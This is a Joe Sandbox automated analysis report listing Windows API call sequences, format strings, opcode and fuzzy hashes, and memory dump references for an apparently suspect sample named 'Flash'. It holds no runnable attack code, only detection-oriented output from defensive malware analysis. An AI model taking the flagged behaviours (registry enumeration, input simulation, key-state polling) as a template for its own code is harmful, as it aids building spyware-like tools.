                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: 3ad0797175668c2b46eecd8660bf3899a5ec19b42b96eecec7cb31cdfe2915f5
                                                        • Instruction ID: cf81f375b031f3eac1f9d4c22d1291be2d3761974e236258c0ef88102d750285
                                                        • Opcode Fuzzy Hash: 3ad0797175668c2b46eecd8660bf3899a5ec19b42b96eecec7cb31cdfe2915f5
                                                        • Instruction Fuzzy Hash: 6D217130A00108AFCB10EFA5C985EAFB7B8EF89704F108469F905DB352DB71EA45CB61
                                                        APIs
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                          • Part of subcall function 00A2AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A2AA6F
                                                          • Part of subcall function 00A2AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A2AA82
                                                          • Part of subcall function 00A2AA52: GetCurrentThreadId.KERNEL32 ref: 00A2AA89
                                                          • Part of subcall function 00A2AA52: AttachThreadInput.USER32(00000000), ref: 00A2AA90
                                                        • GetFocus.USER32 ref: 00A2AC2A
                                                          • Part of subcall function 00A2AA9B: GetParent.USER32(?), ref: 00A2AAA9
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A2AC73
                                                        • EnumChildWindows.USER32(?,00A2ACEB), ref: 00A2AC9B
                                                        • __swprintf.LIBCMT ref: 00A2ACB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                        • String ID: %s%d
                                                        • API String ID: 1941087503-1110647743
                                                        • Opcode ID: 6eede5f4304bbaa9ed8afb212fce517790fdf57802f670ea78ca322c7ba51329
                                                        • Instruction ID: 2e963c67e3dc8de56a31ee75896b0531fc9d86715bd51745467d24d8031037a2
                                                        • Opcode Fuzzy Hash: 6eede5f4304bbaa9ed8afb212fce517790fdf57802f670ea78ca322c7ba51329
                                                        • Instruction Fuzzy Hash: A6110375600215BBDF11BFA4EE85FEA777CAF98300F004075FE08AA182DAB05945CB71
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A32318
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 08a2b0a89ac2f92d8f018cb129769c9b3076dfb3b5e7a40198acd3d8c335e272
                                                        • Instruction ID: 3fec91dc6d1e3b25799bff8b75ac1c7e6390d1f58475577ba5ef2308edf559bd
                                                        • Opcode Fuzzy Hash: 08a2b0a89ac2f92d8f018cb129769c9b3076dfb3b5e7a40198acd3d8c335e272
                                                        • Instruction Fuzzy Hash: B8118E3095021C9FCF00EF94D890AFEB7B8FF55304F108568E814AB2A2EB325D0ACB50
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A4F2F0
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A4F320
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A4F453
                                                        • CloseHandle.KERNEL32(?), ref: 00A4F4D4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 7da573567b0c9614be44bf41eac9c2e97f836e94d63c11d6cccc8aa5eacd0db5
                                                        • Instruction ID: 002979a938d17ef980c4fb6900f5abe7aff44a1de50e37d6ce02dc1bcff56ee5
                                                        • Opcode Fuzzy Hash: 7da573567b0c9614be44bf41eac9c2e97f836e94d63c11d6cccc8aa5eacd0db5
                                                        • Instruction Fuzzy Hash: 1F8171756447009FD720EF68D846F2AB7E5AF88710F14891EF999DB3D2DBB0AC408B91
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A5040D,?,?), ref: 00A51491
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A5075D
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A5079C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A507E3
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00A5080F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5081C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: cc009037aa626d7020ceff9a37bc35a2cb88f208a4044216d20bf974908e2e38
                                                        • Instruction ID: f69c905e58fd77a00b52285f4ee026f505db7935253b5695ebae04eb12daf321
                                                        • Opcode Fuzzy Hash: cc009037aa626d7020ceff9a37bc35a2cb88f208a4044216d20bf974908e2e38
                                                        • Instruction Fuzzy Hash: 1A513A71208244AFD714EF64C881F6BB7F9BF88305F04892DF995872A1DB70E949CB92
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A3EC62
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A3EC8B
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A3ECCA
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A3ECEF
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A3ECF7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 1cbc9f564f44e34f217609ef3f858dfc361ddfe6ead4183888c7fb93be241884
                                                        • Instruction ID: 5203aca0ccca09b2ab94da49ffb28081b0cb89d038e1820a841db5d61cda6941
                                                        • Opcode Fuzzy Hash: 1cbc9f564f44e34f217609ef3f858dfc361ddfe6ead4183888c7fb93be241884
                                                        • Instruction Fuzzy Hash: 7A51FA35A00509DFCB01EFA5C985AAEBBF5EF48314B148095E949AB3A2CB31AD51DF50
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baa63eed69418f379242eb077757a98419e551909dec67765fbb07775c29d6c2
                                                        • Instruction ID: 18f64de1f9a6e18e86a7dc0011147d501698861459d7332ffd05d121321c7ea4
                                                        • Opcode Fuzzy Hash: baa63eed69418f379242eb077757a98419e551909dec67765fbb07775c29d6c2
                                                        • Instruction Fuzzy Hash: B741C135B00104AFD710DB68CC88FAABBB4BB2D352F144265FC16E72D1D770AE45DA61
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 009D2727
                                                        • ScreenToClient.USER32(00A977B0,?), ref: 009D2744
                                                        • GetAsyncKeyState.USER32(00000001), ref: 009D2769
                                                        • GetAsyncKeyState.USER32(00000002), ref: 009D2777
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 7df08962ee79c3b4bee84c61aa8d3a92a2c6eefc993bad76a6d9df935c814293
                                                        • Instruction ID: f88fa285fdd6398f643f98c2acce00c907f2ae1e3cde40d701753459d6064296
                                                        • Opcode Fuzzy Hash: 7df08962ee79c3b4bee84c61aa8d3a92a2c6eefc993bad76a6d9df935c814293
                                                        • Instruction Fuzzy Hash: B5415D75504119FFDF299FA8C844AE9FB74BB19334F10835AF829A62D0C730AD94DB91
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00A295E8
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00A29692
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A2969A
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00A296A8
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A296B0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: cba3f8a518812493760f60011b89d1ffb1cfc58fc07a6bfd872c5a248f06a103
                                                        • Instruction ID: c0a5d23413ee9330440bd7a795555b57903802d96767b50e346f1c78375271c1
                                                        • Opcode Fuzzy Hash: cba3f8a518812493760f60011b89d1ffb1cfc58fc07a6bfd872c5a248f06a103
                                                        • Instruction Fuzzy Hash: FE31CC71900229EFDB14CFACE94CA9F3BB5FB45715F104229F924AB2D0C3B49964DB90
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00A2BD9D
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A2BDBA
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A2BDF2
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A2BE18
                                                        • _wcsstr.LIBCMT ref: 00A2BE22
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: 488205845e6b5072d2366c62fdcdc5356d0174665dafa2ced2829f88febf4c57
                                                        • Instruction ID: e2689fd1fcabaadbc31459e3a51e934b9ef2276163d1333644e40d5c885f4c7d
                                                        • Opcode Fuzzy Hash: 488205845e6b5072d2366c62fdcdc5356d0174665dafa2ced2829f88febf4c57
                                                        • Instruction Fuzzy Hash: C421F832214114BFEB259B79EC09EBB7BADDF84760F114039FD05DA191EBA19C4193B0
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A5B804
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A5B829
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A5B841
                                                        • GetSystemMetrics.USER32(00000004), ref: 00A5B86A
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A4155C,00000000), ref: 00A5B888
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: c2d90ca97e263d3fcc42560935c970ccf791c9cf9f56989778c78ca6bed9b2c1
                                                        • Instruction ID: 1fde2321ab3c59536f1ec81d74f64e81520cfc7debf7c2b5ace52902d7458163
                                                        • Opcode Fuzzy Hash: c2d90ca97e263d3fcc42560935c970ccf791c9cf9f56989778c78ca6bed9b2c1
                                                        • Instruction Fuzzy Hash: 00219171A24215AFCB109F788C48B6A3BA8FB05727F104729FD22D61E0D7709855CBA0
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00A46159
                                                        • GetForegroundWindow.USER32 ref: 00A46170
                                                        • GetDC.USER32(00000000), ref: 00A461AC
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00A461B8
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00A461F3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: c7fc02b5d4daec4e7232ca50520bd05df5f6fa5709f00b0832516dfa2a003472
                                                        • Instruction ID: cac33092b4bd449039bc45644a2c8cc129dc22cbae0b37a5ceddb18013687296
                                                        • Opcode Fuzzy Hash: c7fc02b5d4daec4e7232ca50520bd05df5f6fa5709f00b0832516dfa2a003472
                                                        • Instruction Fuzzy Hash: A821A475A002049FD704EFA9DD84E9AB7F5EF89311F04C469F84A97362CA74AC41CB90
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D1729
                                                        • SelectObject.GDI32(?,00000000), ref: 009D1738
                                                        • BeginPath.GDI32(?), ref: 009D174F
                                                        • SelectObject.GDI32(?,00000000), ref: 009D1778
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 7f26ce35d3d85ccc809bc27ef1e0f0bb1e345612caa092f134b7371bff8d95d9
                                                        • Instruction ID: 59c2e8fbfeaf0e2199d096542a314172533c1bc139fcc9cec533f8d4cd278c70
                                                        • Opcode Fuzzy Hash: 7f26ce35d3d85ccc809bc27ef1e0f0bb1e345612caa092f134b7371bff8d95d9
                                                        • Instruction Fuzzy Hash: 11213031A64208FBDB11DFA4ED48B6E7BB9A710351F14C217F815962B0DBB199D3CBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: ecf79099dd51dad401cf58e0fd284b914afdee3c3256a60bcd65336446522abf
                                                        • Instruction ID: 113ce2cc3ac73a5cc0d34fffba717cfd9c7d5f6b6134eb1fff28f32d61624e21
                                                        • Opcode Fuzzy Hash: ecf79099dd51dad401cf58e0fd284b914afdee3c3256a60bcd65336446522abf
                                                        • Instruction Fuzzy Hash: E601B573A405297BD614A719AC82FBF737CAE707A4F048535FE06D6742E7A0DE1582E0
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A35075
                                                        • __beginthreadex.LIBCMT ref: 00A35093
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00A350A8
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A350BE
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A350C5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 525069554be2fc1554490912ab26d7c17c12e3d762fd6c684b7c98708cb69cc1
                                                        • Instruction ID: 5a2cf1ded897875b2d6077c6f42e96674779d461cc064c2b0862770f39274cb6
                                                        • Opcode Fuzzy Hash: 525069554be2fc1554490912ab26d7c17c12e3d762fd6c684b7c98708cb69cc1
                                                        • Instruction Fuzzy Hash: 3A11C276918608AFC701CBE89C04ADF7BA8AB46320F140256F914D3250D6B2894187F0
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A28E3C
                                                        • GetLastError.KERNEL32(?,00A28900,?,?,?), ref: 00A28E46
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00A28900,?,?,?), ref: 00A28E55
                                                        • HeapAlloc.KERNEL32(00000000,?,00A28900,?,?,?), ref: 00A28E5C
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A28E73
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: bdd6258301ec78f74d44b3a2f1fad25998e7d3b7395e6d4beb3b2cd6021790b9
                                                        • Instruction ID: a8edb32687cc4c81d930a3bf0bcf8368c81a1ca26ce999ad1e622191efa72499
                                                        • Opcode Fuzzy Hash: bdd6258301ec78f74d44b3a2f1fad25998e7d3b7395e6d4beb3b2cd6021790b9
                                                        • Instruction Fuzzy Hash: 4F0186B4201214BFDB118FE9EC48D6B7FBDEF863557100629F845C2220DBB1DC51CA60
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A3581B
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A35829
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A35831
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A3583B
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A35877
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
